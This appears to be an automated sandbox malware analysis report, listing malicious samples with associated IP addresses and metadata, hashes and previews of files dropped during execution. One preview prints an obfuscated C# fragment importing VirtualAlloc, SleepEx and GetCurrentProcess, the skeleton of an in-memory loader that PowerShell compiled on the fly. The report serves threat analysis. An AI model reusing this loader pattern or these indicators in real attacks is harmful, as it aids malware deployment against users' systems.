 | d6YCUW421p.dll | malicious |
 | FJHd.dll | malicious |
 | NdmYtW.dll | malicious |
 | pDut.dll | malicious |
 | HxEWwh74qT.dll | malicious |
 | b.exe | malicious |
 | 0x0007000000012676-63.exe | malicious |
                                      No context
Match | Associated Sample Name / URL | Detection | Context
TENET-1ZA | sora.arm | malicious | 163.200.117.90
 | nhLAwAo49f.dll | malicious | 146.70.35.138
 | d6YCUW421p.dll | malicious | 146.70.35.138
 | FJHd.dll | malicious | 146.70.35.138
 | NdmYtW.dll | malicious | 146.70.35.138
 | pDut.dll | malicious | 146.70.35.138
 | HxEWwh74qT.dll | malicious | 146.70.35.138
 | o0nBmbV6au | malicious | 163.200.142.51
 | 84wwQQbbDj | malicious | 143.128.168.158
 | o2AHUUgivh | malicious | 146.239.92.86
 | b.exe | malicious | 146.70.35.138
 | bKhQyaq7WP.exe | malicious | 146.70.87.230
 | wZtQzFZJYa.exe | malicious | 146.70.87.230
 | H7qgr6X0nv | malicious | 155.233.139.115
 | eoT6xLnNfY.exe | malicious | 146.70.87.230
 | jew.x86 | malicious | 146.69.137.13
 | sora.arm | malicious | 155.232.149.247
 | irq0 | malicious | 146.68.19.240
 | l0zzxRl556.exe | malicious | 146.70.87.230
 | wuxznEjJoI | malicious | 143.128.168.138
                                      No context
                                      No context
                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                      File Type:Little-endian UTF-16 Unicode text, with CRLF line terminators
                                      Category:dropped
                                      Size (bytes):65536
                                      Entropy (8bit):0.8484271078729315
                                      Encrypted:false
                                      SSDEEP:96:8xnXzFGeUnYyQy9haot7Jn4pXIQcQac6pcEccw35+a+z+HbHg+AS/YyNlISWbSmH:8RzoneH0tGtjLq/u7sZS274ItW
                                      MD5:AC7F4345BC16B046B4BD7A4B49FAD9DE
                                      SHA1:31DB96A77E8C9352345D2D35BDD922C5A989733E
                                      SHA-256:0FE9F258A2E001391DD7FE936ED71F39F02E4A21502048E07AD9AFF57D5D9B8A
                                      SHA-512:F029D90D1FE667A52F3ECD173F11501CA11E15159116660080259EA0F562063CD60BA96DEE65A25CC56E7BBCED3D62E93FDE77354CFF4B959ABF6E7EDDC92DC6
                                      Malicious:false
                                      Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.2.9.5.1.6.7.9.2.6.8.6.4.1.0.0.3.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.2.9.5.1.6.7.9.2.9.5.6.7.2.1.0.0.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.3.7.2.4.1.b.1.9.-.9.c.1.3.-.4.6.3.b.-.a.9.b.d.-.4.a.9.5.3.6.d.5.a.3.2.d.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.0.1.2.f.1.2.6.9.-.a.2.3.4.-.4.9.c.1.-.a.a.e.4.-.4.e.4.1.7.5.a.d.7.b.a.e.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.l.o.a.d.d.l.l.3.2...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.0.5.9.4.-.0.0.0.1.-.0.0.1.c.-.6.f.9.9.-.5.e.0.5.d.9.5.6.d.8.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.0.d.a.3.9.a.3.e.e.5.e.6.b.4.b.0.d.3.2.5.5.b.f.e.f.9.5.6.0.1.8.9.0.a.f.d.8.0.7.0.9.!.0.0.0.0.d.a.3.9.a.3.e.e.5.e.6.b.4.b.0.d.3.2.5.5.b.f.e.f.9.5.6.0.1.8.9.0.a.f.d.8.0.7.0.9.!.l.o.a.d.d.l.l.3.2...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.
                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                      File Type:Little-endian UTF-16 Unicode text, with CRLF line terminators
                                      Category:dropped
                                      Size (bytes):65536
                                      Entropy (8bit):0.8450263074663521
                                      Encrypted:false
                                      SSDEEP:96:86XqFfeUnYyGy9haTKzfopXIQcQac6FcElcw3d+a+z+HbHg+AS/YyNlISWbSm9mK:8aqFnoHEBPBjLq/u7sZS274ItW
                                      MD5:E3453784F5987FFC4297D68B3E5806EC
                                      SHA1:8AE5D7F0D9E1EDD426FD57793895BF06C7D55090
                                      SHA-256:A19FAA5C0A3344576E5CA6B3D224AF727B5260220821BFD197D80F502CC5D9FC
                                      SHA-512:FEDF432EFCB2E02D4F617DBEC17EFD457DA47CE6D4AC7040046C4696A1CB7D78E1D2F57F0E7E44C6B2E4ADFDD4B1900F4350B8B0DFCFE51F01448A96D011F5D8
                                      Malicious:false
                                      Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.2.9.5.1.6.7.9.3.3.6.0.5.9.2.2.5.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.2.9.5.1.6.7.9.3.5.3.0.9.0.5.4.6.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.e.e.6.8.f.e.a.e.-.1.3.e.b.-.4.b.8.7.-.a.8.a.d.-.3.5.e.c.1.a.c.8.a.3.e.a.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.1.2.4.9.d.4.4.c.-.a.8.3.4.-.4.9.8.a.-.b.a.8.2.-.c.3.d.a.4.5.4.7.f.4.1.a.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.l.o.a.d.d.l.l.3.2...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.0.5.9.4.-.0.0.0.1.-.0.0.1.c.-.6.f.9.9.-.5.e.0.5.d.9.5.6.d.8.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.0.d.a.3.9.a.3.e.e.5.e.6.b.4.b.0.d.3.2.5.5.b.f.e.f.9.5.6.0.1.8.9.0.a.f.d.8.0.7.0.9.!.0.0.0.0.d.a.3.9.a.3.e.e.5.e.6.b.4.b.0.d.3.2.5.5.b.f.e.f.9.5.6.0.1.8.9.0.a.f.d.8.0.7.0.9.!.l.o.a.d.d.l.l.3.2...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.
                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                      File Type:Mini DuMP crash report, 15 streams, Sat Apr 23 06:12:08 2022, 0x1205a4 type
                                      Category:dropped
                                      Size (bytes):39506
                                      Entropy (8bit):2.072438553320638
                                      Encrypted:false
                                      SSDEEP:192:J54NgWJJkH67dJ+OIKcUcXyK7UbBDaNCQSxtledkyhmWlzwkEFsdw:3LWT7j5IjU4yK7UbBDaMQ6tledkytK
                                      MD5:C917F1742DC83F5A043197F2F54A0C4E
                                      SHA1:AACA0FC29708705FDBB4F63CC4E9962D0EC5E3EF
                                      SHA-256:142F090B56F1D4E7F37963F99E41AAD407C6F3C1F845BC0915A7EFF81C662889
                                      SHA-512:61CE862EBD1E02188B5920FA6A57B7269CC4B69FE874AF24C8EB589484EC9B08B540D6E4550CA540686700FAB1A8BC6065D34B9DD7F7DDFF68E5E1E6D68004A6
                                      Malicious:false
                                      Preview:MDMP....... .........cb........................4...........$................)..........`.......8...........T...............j............................................................................................U...........B..............GenuineIntelW...........T.............cb.............................0..................W... .E.u.r.o.p.e. .S.t.a.n.d.a.r.d. .T.i.m.e.......................................W... .E.u.r.o.p.e. .D.a.y.l.i.g.h.t. .T.i.m.e.......................................1.7.1.3.4...1...x.8.6.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.........................................................................................................................................................................................................................................................................................................................................................................................................................................
                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                      File Type:XML 1.0 document, Little-endian UTF-16 Unicode text, with CRLF line terminators
                                      Category:dropped
                                      Size (bytes):8340
                                      Entropy (8bit):3.69846117157985
                                      Encrypted:false
                                      SSDEEP:192:Rrl7r3GLNiN/6idq06Y43SUHqgmfJSP+prQ89bgW2TsfkAm:RrlsNiF6W6YoSUKgmfJS2gW24fy
                                      MD5:03FE517493CDA2DA9A9CB5CF3B51E3C8
                                      SHA1:6DAA111381E6A2BA15D14F385ECD9EE1E680EE70
                                      SHA-256:088A2319CDDC0633C74897267FED482A3F4602182B6757D5E276C4283FAA5988
                                      SHA-512:2097EA78A64D0674A3B8CA2D51A0229B07993A46B876B48F168F926A802EDD16BE710F9EFEB5CA1B5468D0F5E26299ED049E44074A9923C903CAD0A66D567DBC
                                      Malicious:false
                                      Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.7.1.3.4.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.7.1.3.4...1...a.m.d.6.4.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.1.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.1.0.3.3.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.1.4.2.8.<./.P.i.d.>.......
                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                      File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                      Category:dropped
                                      Size (bytes):4598
                                      Entropy (8bit):4.468439994201981
                                      Encrypted:false
                                      SSDEEP:48:cvIwSD8zs6JgtWI9PnWgc8sqYjhP8fm8M4J2+EZFI+q849hGpKcQIcQw0kd:uITfIoWgrsqY1UJKErGpKkw0kd
                                      MD5:1F581D2D671323001820EEC345955E8D
                                      SHA1:84D57DE07A1A92920A775FD9A2EF441FD6D55EDC
                                      SHA-256:F3C1719825384E2811940641C8F25B5C7C9A8CF7FDFF96C79BD1B7094C66BDC1
                                      SHA-512:E435C1E51CFA9E549F043F8BE4DA0878D52CAA517CC84E732A0800404F08FCC0EE1566E386E3B198C6E254997C8707CD2ED5AF4131285373A55FCFE4191FBF2C
                                      Malicious:false
                                      Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="17134" />.. <arg nm="vercsdbld" val="1" />.. <arg nm="verqfe" val="1" />.. <arg nm="csdbld" val="1" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="244" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="1484122" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.1.17134.0-11.0.47" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="4096" />..
                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                      File Type:Mini DuMP crash report, 15 streams, Sat Apr 23 06:12:14 2022, 0x1205a4 type
                                      Category:dropped
                                      Size (bytes):36062
                                      Entropy (8bit):1.9519178024623962
                                      Encrypted:false
                                      SSDEEP:192:b5fZJJkHYyfKOIKcmk2QSxksjVaYHbiJjmJmRsK:9h4VIjmk2Q6ksjYUmX
                                      MD5:B26D761700EC27A85A7E8306F7D9C1CD
                                      SHA1:26BA946FC504E3B720545A54C6166E6A2841B1FC
                                      SHA-256:A4A981D31AF326622D356EB84A53F327157F52F7EFB02CADB292060F7810FE72
                                      SHA-512:3205B01478F80D692A1735122340421C8868EF2150ACB96AFFB58777B301034BF223260BF04B93CCDA2F160E29DA10286CD50E4077D174CBEDA5750449E600C3
                                      Malicious:false
                                      Preview:MDMP....... .........cb........................4...........$................)..........`.......8...........T................t...........................................................................................U...........B..............GenuineIntelW...........T.............cb.............................0..................W... .E.u.r.o.p.e. .S.t.a.n.d.a.r.d. .T.i.m.e.......................................W... .E.u.r.o.p.e. .D.a.y.l.i.g.h.t. .T.i.m.e.......................................1.7.1.3.4...1...x.8.6.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.........................................................................................................................................................................................................................................................................................................................................................................................................................................
                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                      File Type:XML 1.0 document, Little-endian UTF-16 Unicode text, with CRLF line terminators
                                      Category:dropped
                                      Size (bytes):8300
                                      Entropy (8bit):3.69036741286865
                                      Encrypted:false
                                      SSDEEP:192:Rrl7r3GLNiNx6ihq06Y4YSUfPgmfRSO+pDn89b3dW2Tsf3lFm:RrlsNiL6q6Y3SU3gmfRSitW24fe
                                      MD5:C80DFEB2FD09E96D80A105BF1416186F
                                      SHA1:C2E029A858E8ED96BB46CEB163704C526428BB15
                                      SHA-256:B3CE25563BAB4D09351E626D47559203FC2F9E73F43D27AD95C8222BBF41688F
                                      SHA-512:785520C461DF2D2ABFFD907C65A3656B50232434394EA4CE68D02BBC5569D2D3EB307DA67ADCD9C9CE8FD99F9FC0AA888E4456CF642EA1AC3E72D14B7C470FD5
                                      Malicious:false
                                      Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.7.1.3.4.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.7.1.3.4...1...a.m.d.6.4.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.1.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.1.0.3.3.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.1.4.2.8.<./.P.i.d.>.......
                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                      File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                      Category:dropped
                                      Size (bytes):4564
                                      Entropy (8bit):4.439548228059502
                                      Encrypted:false
                                      SSDEEP:48:cvIwSD8zs6JgtWI9PnWgc8sqYjhx8fm8M4J2+voFI+q84acupKcQIcQw0kd:uITfIoWgrsqY1WJVBO/pKkw0kd
                                      MD5:DF03F167543BFE5B6CDEF17CD6CDB700
                                      SHA1:6BBC61B7DBF6EB32A530D87A971944CDD312120D
                                      SHA-256:84B755FD6CFD16130CE8987B8BBE160B50DAB6E97F05AB376C74909198264B80
                                      SHA-512:504C3F517AFEBFE84B4641320FCCB9107C42081F8A6A8672E073F46341DF6CF43569F29E69B8623EC2F86F32A92262FD58EB57FBA10F4F81EACBD4AD6E3E719E
                                      Malicious:false
                                      Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="17134" />.. <arg nm="vercsdbld" val="1" />.. <arg nm="verqfe" val="1" />.. <arg nm="csdbld" val="1" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="244" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="1484122" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.1.17134.0-11.0.47" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="4096" />..
                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                      File Type:data
                                      Category:modified
                                      Size (bytes):11606
                                      Entropy (8bit):4.8910535897909355
                                      Encrypted:false
                                      SSDEEP:192:P9smn3YrKkkdcU6ChVsm5emlz9smyib4T4YVsm5emdYxoeRKp54ib49VFn3eGOVJ:dMib4T4YLiib49VoGIpN6KQkj2rIkjhQ
                                      MD5:F84F6C99316F038F964F3A6DB900038F
                                      SHA1:C9AA38EC8188B1C2818DBC0D9D0A04085285E4F1
                                      SHA-256:F5C3C45DF33298895A61B83FC6E79E12A767A2AE4E06B43C44C93CE18431793E
                                      SHA-512:E5B80F0D754779E6445A14B8D4BA29DD6D0060CD3DA6AFD00416DDC113223DB48900F970F9998B2ABDADA423FBA4F11E9859ABB4E6DBA7FE9550E7D1D0566F31
                                      Malicious:false
                                      Preview:PSMODULECACHE.....7B\.....C...C:\Program Files\WindowsPowerShell\Modules\Pester\3.4.0\Pester.psm1........SafeGetCommand........Get-ScriptBlockScope....$...Get-DictionaryValueFromFirstKeyFound........New-PesterOption........Invoke-Pester........ResolveTestScripts........Set-ScriptBlockScope................a...C:\Program Files (x86)\WindowsPowerShell\Modules\PackageManagement\1.0.0.1\PackageManagement.psd1........Unregister-PackageSource........Save-Package........Install-PackageProvider........Find-PackageProvider........Install-Package........Get-PackageProvider........Get-Package........Uninstall-Package........Set-PackageSource........Get-PackageSource........Find-Package........Register-PackageSource........Import-PackageProvider.........3......[...C:\Program Files\WindowsPowerShell\Modules\PackageManagement\1.0.0.1\PackageManagement.psd1........Set-PackageSource........Unregister-PackageSource........Get-PackageSource........Install-Package........Save-Package........Get-Package...
                                      Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                      File Type:Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x48a, 9 symbols
                                      Category:dropped
                                      Size (bytes):1328
                                      Entropy (8bit):3.985489714311352
                                      Encrypted:false
                                      SSDEEP:24:Hre9ERhfpaDfHVhKdNWI+ycuZhNPHqakSGHbPNnq9qd:LSjKd41ulPqa30Rq9K
                                      MD5:67C978F8F6E761129B658BABBAC2C0E3
                                      SHA1:02E6453D6EA95F5A0EBB0631D927EE771F4B7B0A
                                      SHA-256:9BB6FB8D9FDC155D50F117D1CE410A264593B74F41FEA700ED29099228FA1C4A
                                      SHA-512:78B24238F9F3B4FCF3507F65C29D5F7BA58EBD9866A22239C476D50CDF207B93030B71584F41784CBB2DECB40C888689A5C7BD9953555770ACCCA9954B5A23BD
                                      Malicious:false
                                      Preview:L....cb.............debug$S........L...................@..B.rsrc$01........X.......0...........@..@.rsrc$02........P...:...............@..@........R....c:\Users\user\AppData\Local\Temp\poet0yxq\CSCB57F583549494C91A9647985948976.TMP.................a.....-...`.~............4.......C:\Users\user\AppData\Local\Temp\RES2392.tmp.-.<...................'...Microsoft (R) CVTRES.[.=..cwd.C:\Windows\system32.exe.C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe................................................0.......................H.......L...........H.........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...p.o.e.t.0.y.x.q...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.
                                      Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                      File Type:Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x48a, 9 symbols
                                      Category:dropped
                                      Size (bytes):1328
                                      Entropy (8bit):3.965326095070505
                                      Encrypted:false
                                      SSDEEP:24:HJe9EuZfTDQDfHLWhKdNWI+ycuZhNsrakSPEPNnq9qd:ABTqrMKd41ulsra3PEq9K
                                      MD5:E34239A621ECB61A5F50016AE522485A
                                      SHA1:EDD24063A2BC018FA0F98951A747630C5925D5FE
                                      SHA-256:E0F555AAE679A2E77185A2DAD637DAD6F1477AEA45415837C204061570AC891E
                                      SHA-512:5DBA844206EEA3E6E4EC60343E5AA08271F863EC568A169E9EB0904C0D4979CDC5435999ABA05E08CF6AD6DC29078C89CF6C0AC8509D7C3CB4DBEB7D60DECED1
                                      Malicious:false
                                      Preview:L....cb.............debug$S........L...................@..B.rsrc$01........X.......0...........@..@.rsrc$02........P...:...............@..@........S....c:\Users\user\AppData\Local\Temp\bscdh0f0\CSCCEA1AC591E3E41DFA7DCA22F6F20A95.TMP.................sf.]..E`W`..<............4.......C:\Users\user\AppData\Local\Temp\RES3B60.tmp.-.<...................'...Microsoft (R) CVTRES.[.=..cwd.C:\Windows\system32.exe.C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe................................................0.......................H.......L...........H.........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...b.s.c.d.h.0.f.0...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.
                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                      File Type:very short file (no magic)
                                      Category:dropped
                                      Size (bytes):1
                                      Entropy (8bit):0.0
                                      Encrypted:false
                                      SSDEEP:3:U:U
                                      MD5:C4CA4238A0B923820DCC509A6F75849B
                                      SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                      SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                      SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                      Malicious:false
                                      Preview:1
                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                      File Type:very short file (no magic)
                                      Category:dropped
                                      Size (bytes):1
                                      Entropy (8bit):0.0
                                      Encrypted:false
                                      SSDEEP:3:U:U
                                      MD5:C4CA4238A0B923820DCC509A6F75849B
                                      SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                      SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                      SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                      Malicious:false
                                      Preview:1
                                      Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                      File Type:MSVC .res
                                      Category:dropped
                                      Size (bytes):652
                                      Entropy (8bit):3.0806512987018424
                                      Encrypted:false
                                      SSDEEP:12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5gryKrak7YnqqPEPN5Dlq5J:+RI+ycuZhNsrakSPEPNnqX
                                      MD5:8C7366A75D058E4560576098B53C2E89
                                      SHA1:5474E9C863C4BB1B86DA13FEB1DCBAC13BEA6A83
                                      SHA-256:045887EA02E67AD0120E0D470B59C58099BFDBA859F1F3E31989AE8800BC7765
                                      SHA-512:CDA6B16F3E42B84FB648CD74482E2B7C4B9E2EB463F8D24A96E3893AD7667D9CBC094AE597AF695AD032ADA6CADE89F3E891EC2F6896966882516BBE7DBC3BF1
                                      Malicious:false
                                      Preview:.... ...........................L...<...............0...........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...b.s.c.d.h.0.f.0...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...b.s.c.d.h.0.f.0...d.l.l.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0...
                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                      File Type:UTF-8 Unicode (with BOM) text
                                      Category:dropped
                                      Size (bytes):417
                                      Entropy (8bit):5.038440975503667
                                      Encrypted:false
                                      SSDEEP:6:V/DsYLDS81zuJlmMRSRa+eNMjSSRr/++5xVBuSRNA5cWGQRZry:V/DTLDfu09eg5rG+5zBlK5Ny
                                      MD5:AE91D1351B9FB773FEF9B6F31D0A22EE
                                      SHA1:323F9FAD2F10ABDC97A7BF643A35DE67E3A32E31
                                      SHA-256:2CEDA574437717CB5084A6D8315F059002F22D45837C60C003F1F09BB0A72DCD
                                      SHA-512:94C098F8D6FA16950D6CC582D7303D6B1383126C8DB3AA1C85D7E4E155143E2A4E42B3C96A7B5EFAA53CA3AA8A81CDB97B641D1F4521C67456158C32046A8E23
                                      Malicious:false
                                      Preview:.using System;.using System.Runtime.InteropServices;..namespace W32.{. public class omrgvusmwh. {. [DllImport("kernel32")].public static extern IntPtr GetCurrentProcess();.[DllImport("kernel32")].public static extern void SleepEx(uint ooyvxktqmjp,uint oshbdrwt);.[DllImport("kernel32")].public static extern IntPtr VirtualAlloc(IntPtr payqgxim,uint tthajtdrqfh,uint vcyatdpvykk,uint vnrytmsowy);.. }..}.
                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                      File Type:UTF-8 Unicode (with BOM) text, with very long lines, with no line terminators
                                      Category:dropped
                                      Size (bytes):369
                                      Entropy (8bit):5.246210484932597
                                      Encrypted:false
                                      SSDEEP:6:pAu+H2LvkuqJDdqxLTKbDdqB/6K2wkn23fbNOzxs7+AEszIwkn23fbNYA:p37Lvkmb6KRfT4WZEifT1
                                      MD5:1DFF526FD701241566C75FC5465D31AF
                                      SHA1:5D91CBBE8D1F790F3A38CE35DAB4F705A0BEEF6E
                                      SHA-256:ED2CAE80D53441FB70A3307AEB276D80C5D4176F9A9D336B5C87305DC0064ACF
                                      SHA-512:E38E5E1D62A47ACAE2F46256453F82352BD5A6AF881D21EB8EC317AB60B4AE452E95E018271A9DD44FA9176799BFE8FB05E5359AF14399820DF6EDAECE85B2D5
                                      Malicious:false
